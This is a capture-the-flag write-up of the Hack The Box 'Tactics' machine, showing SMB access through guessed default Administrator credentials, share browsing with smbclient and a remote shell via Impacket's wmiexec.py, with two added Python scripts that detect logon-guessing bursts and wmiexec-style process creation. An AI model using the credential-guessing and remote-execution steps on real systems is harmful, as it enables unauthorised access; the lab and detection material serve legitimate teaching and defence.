Tactics Writeup

Introduction

This was a straightforward box, very similar to a previous Starting Point machine: gain access to SMB via brute force, then use the valid credentials with Impacket to get a semi-interactive shell on the box.

This wraps up Tier 1 machines. Next is Tier 2 and then on to some retired machines!

Initial Recon

Started with the standard nmap scan.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ sudo nmap -sC -sV -oA Tactics/nmap $tgt
[sudo] password for crimson: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-27 20:20 CDT
Nmap scan report for 10.129.68.31
Host is up (0.050s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-28T01:20:51
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.50 seconds

There are a few ports open – RPC on 135, NetBIOS on 139, and SMB on 445.

Initial Access

SMB

The first thing I do when I see port 445 is try to list shares. With no intel, I try the standard username and password combinations listed below. In this case the Administrator account works and the standard Windows administrative shares are listed. For more information regarding SMB, check out the writeup for Dancing.

Username        Password
(blank)         (blank)
Administrator   (blank), administrator, admin, password

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Tactics]
└─$ smbclient -U 'Administrator' -L \\$tgt      
Enter WORKGROUP\Administrator's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.68.31 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Tactics]
└─$ 
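The share listing above only works because the credential guessing in the table succeeded. Seen from the target, every one of those smbclient attempts is a network logon (LogonType 3) in the Windows Security log: a 4625 per failure and a 4624 once a guess lands. The following script is an added example, not part of the original writeup, that runs that detection over a handful of constructed log lines (the pipe-delimited shape, the 10.10.14.x source addresses, the svc_backup and jsmith accounts and the timestamps are all made up for the example): it flags any source that produces a burst of network-logon failures inside a short window, and notes whether a network logon from that source then succeeded, which is the "guessing that worked" case the writeup demonstrates.

```python
"""Detect SMB credential guessing (and guessing that succeeded) from Windows Security events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real logs. Each line: timestamp|EventID|key=value...
# 4625 = failed logon, 4624 = successful logon. LogonType=3 is a network logon, which is
# what an SMB authentication attempt from smbclient produces on the target host.
SAMPLE_EVENTS = [
    "2022-05-28T01:20:51|4625|LogonType=3|TargetUser=-|SourceIP=10.10.14.5|Status=0xC000006D",
    "2022-05-28T01:21:03|4625|LogonType=3|TargetUser=Administrator|SourceIP=10.10.14.5|Status=0xC000006D",
    "2022-05-28T01:21:10|4625|LogonType=3|TargetUser=Administrator|SourceIP=10.10.14.5|Status=0xC000006D",
    "2022-05-28T01:21:18|4625|LogonType=3|TargetUser=Administrator|SourceIP=10.10.14.5|Status=0xC000006D",
    "2022-05-28T01:21:25|4624|LogonType=3|TargetUser=Administrator|SourceIP=10.10.14.5|Status=0x0",
    "2022-05-28T01:30:00|4625|LogonType=3|TargetUser=svc_backup|SourceIP=10.10.14.9|Status=0xC000006D",
    "2022-05-28T01:30:40|4625|LogonType=3|TargetUser=svc_backup|SourceIP=10.10.14.9|Status=0xC000006D",
    "2022-05-28T01:45:12|4625|LogonType=2|TargetUser=jsmith|SourceIP=-|Status=0xC000006D",
]

FAILED_LOGON, SUCCESS_LOGON, NETWORK_LOGON = "4625", "4624", "3"


def parse_event(line):
    """Turn one pipe-delimited sample line into a dict with a datetime timestamp."""
    ts, event_id, *fields = line.split("|")
    rec = {"ts": datetime.fromisoformat(ts), "id": event_id}
    rec.update(f.split("=", 1) for f in fields)
    return rec


def find_guessing_sources(lines, threshold=4, window=timedelta(minutes=2)):
    """Return {source_ip: {...}} for every source that produced `threshold` or more
    network-logon failures inside any `window`, noting whether a later network logon
    from the same source then succeeded (guessing that worked)."""
    failures, successes = defaultdict(list), defaultdict(list)
    for rec in map(parse_event, lines):
        if rec.get("LogonType") != NETWORK_LOGON:
            continue  # console/RDP logons are a different signal; skip them here
        if rec["id"] == FAILED_LOGON:
            failures[rec["SourceIP"]].append(rec)
        elif rec["id"] == SUCCESS_LOGON:
            successes[rec["SourceIP"]].append(rec)

    alerts = {}
    for ip, recs in failures.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end, rec in enumerate(recs):
            # slide the window so that recs[start:end+1] all fall within `window`
            while rec["ts"] - recs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(ip, {}).get("failures", 0):
                burst = recs[start:end + 1]
                later_ok = [s for s in successes[ip] if s["ts"] >= burst[-1]["ts"]]
                alerts[ip] = {
                    "failures": count,
                    "users": sorted({r["TargetUser"] for r in burst}),
                    "success_after_burst": later_ok[0]["TargetUser"] if later_ok else None,
                }
    return alerts


if __name__ == "__main__":
    for ip, info in find_guessing_sources(SAMPLE_EVENTS).items():
        print(ip, info)
```

With the defaults, only 10.10.14.5 is reported: four failures in under half a minute, spread over the anonymous ("-") and Administrator accounts, followed by a successful Administrator logon from the same address. The second source never reaches the threshold and the interactive (LogonType 2) failure is ignored entirely. The threshold and window are deliberately parameters; a handful of typos from one workstation is normal, a burst of distinct accounts from one address that ends in a success is not.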

Since I can list shares, I check whether I can connect to one, and sure enough I can. Being able to open C$ already shows the account has administrative rights on the host. From here I could navigate the file system and pull files back, but there is another popular tool I could use to achieve the same end state.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Tactics]
└─$ smbclient -U 'Administrator' \\\\$tgt\\C$
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Wed Apr 21 10:23:49 2021
  Config.Msi                        DHS        0  Wed Jul  7 13:04:56 2021
  Documents and Settings          DHSrn        0  Wed Apr 21 10:17:12 2021
  pagefile.sys                      AHS 738197504  Fri May 27 20:15:10 2022
  PerfLogs                            D        0  Sat Sep 15 02:19:00 2018
  Program Files                      DR        0  Wed Jul  7 13:04:24 2021
  Program Files (x86)                 D        0  Wed Jul  7 13:03:38 2021
  ProgramData                        DH        0  Wed Apr 21 10:31:48 2021
  Recovery                         DHSn        0  Wed Apr 21 10:17:15 2021
  System Volume Information         DHS        0  Wed Apr 21 10:34:04 2021
  Users                              DR        0  Wed Apr 21 10:23:18 2021
  Windows                             D        0  Fri May 27 21:24:20 2022

                3774463 blocks of size 4096. 1158534 blocks available
smb: \> cd Users/Administrator/Desktop
smb: \Users\Administrator\Desktop\> dir
  .                                  DR        0  Thu Apr 22 02:16:03 2021
  ..                                 DR        0  Thu Apr 22 02:16:03 2021
  desktop.ini                       AHS      282  Wed Apr 21 10:23:32 2021
  flag.txt                            A       32  Fri Apr 23 04:39:00 2021

                3774463 blocks of size 4096. 1158534 blocks available

Priv Esc

Impacket is a very popular collection of Python scripts for working with Windows network protocols. In this scenario I used wmiexec.py, which provides more functionality than connecting via smbclient: rather than only browsing shares and transferring files, it gives me a semi-interactive shell in which I can run commands, as seen below.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Tactics]
└─$ python3 /opt/impacket/examples/wmiexec.py Administrator@$tgt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users/Administrator/Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is EEE0-FCDB

 Directory of C:\Users\Administrator\Desktop

04/22/2021  12:16 AM    <DIR>          .
04/22/2021  12:16 AM    <DIR>          ..
04/23/2021  02:39 AM                32 flag.txt
               1 File(s)             32 bytes
               2 Dir(s)   4,743,864,320 bytes free

C:\Users\Administrator\Desktop>whoami
tactics\administrator

C:\Users\Administrator\Desktop>
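What makes this shell "semi-interactive" is also what makes it visible on the host: wmiexec.py runs each command as a separate process through WMI, so every line typed above becomes a cmd.exe child of the WMI provider host (WmiPrvSE.exe), and by default the tool redirects each command's output into a file named __<unix time> on the ADMIN$ share via the loopback address and reads it back over SMB. The script below is an added example, not part of the original writeup or of Impacket, that checks process-creation records for that shape. The pipe-delimited record format, the event lines (including the cd/dir/whoami commands mirroring the session above, the TACTICS\Administrator user taken from the whoami output, and the PowerShell, explorer.exe and msiexec.exe entries) and the timestamps are constructed for the example; the command-line pattern matched is the default one wmiexec.py builds.

```python
"""Flag wmiexec.py-shaped remote execution in process-creation telemetry."""
import re

# Constructed sample events, not real logs. Fields mirror what Security event 4688 or
# Sysmon event 1 provide: timestamp|ParentImage|Image|CommandLine|User
SAMPLE_EVENTS = [
    r"2022-05-28T01:22:05|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd.exe /Q /c cd Users/Administrator/Desktop 1> \\127.0.0.1\ADMIN$\__1653700925.25 2>&1|TACTICS\Administrator",
    r"2022-05-28T01:22:11|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd.exe /Q /c dir 1> \\127.0.0.1\ADMIN$\__1653700925.25 2>&1|TACTICS\Administrator",
    r"2022-05-28T01:22:19|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\cmd.exe|cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1653700925.25 2>&1|TACTICS\Administrator",
    r"2022-05-28T01:25:40|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -File C:\scripts\inventory.ps1|NT AUTHORITY\SYSTEM",
    r"2022-05-28T01:26:02|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir|TACTICS\jsmith",
    r"2022-05-28T01:27:30|C:\Windows\System32\wbem\WmiPrvSE.exe|C:\Windows\System32\msiexec.exe|msiexec.exe /i agent.msi /qn|NT AUTHORITY\SYSTEM",
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# wmiexec.py's default output channel: "1> \\127.0.0.1\<share>$\__<unix time> 2>&1"
LOOPBACK_SHARE_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\[A-Za-z]+\$\\__\d+(?:\.\d+)?", re.IGNORECASE)
# the wrapper wmiexec.py puts around the operator's command; group 1 is the command itself
WRAPPED_COMMAND = re.compile(r"(?i)^cmd\.exe\s+/Q\s+/c\s+(.*?)(?:\s+1>\s*\S+\s+2>&1)?$")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(parent_image, image, command_line):
    """Return 'high', 'medium' or None for one process-creation record."""
    if basename(parent_image) != "wmiprvse.exe" or basename(image) not in SHELLS:
        return None  # shells with ordinary parents and WMI-spawned non-shells are out of scope here
    if LOOPBACK_SHARE_REDIRECT.search(command_line):
        return "high"  # output funnelled through the loopback admin share: the default wmiexec.py channel
    return "medium"  # a shell under the WMI provider host; also covers runs that suppress output


def inner_command(command_line):
    """Strip the cmd.exe /Q /c wrapper and output redirect, leaving what the operator typed."""
    m = WRAPPED_COMMAND.match(command_line)
    return m.group(1) if m else command_line


def find_wmiexec_activity(lines):
    """Return one hit dict per record that looks like WMI-driven remote command execution."""
    hits = []
    for line in lines:
        ts, parent, image, cmd, user = line.split("|")
        level = classify(parent, image, cmd)
        if level:
            hits.append({"ts": ts, "user": user, "confidence": level, "command": inner_command(cmd)})
    return hits


if __name__ == "__main__":
    for hit in find_wmiexec_activity(SAMPLE_EVENTS):
        print(hit)
```

Run against the sample, the three cmd.exe records come back as high-confidence hits with the original cd, dir and whoami commands recovered, the PowerShell script launched under WmiPrvSE.exe is reported at medium confidence for a human to check, and the explorer.exe-spawned cmd.exe and the WMI-launched msiexec.exe are not reported. Several high-confidence hits for the same user within a few seconds, as here, is the footprint of a wmiexec session rather than a one-off WMI call. The medium tier matters because the loopback redirect disappears when an operator suppresses output, while the WmiPrvSE.exe-to-shell parent/child relationship does not.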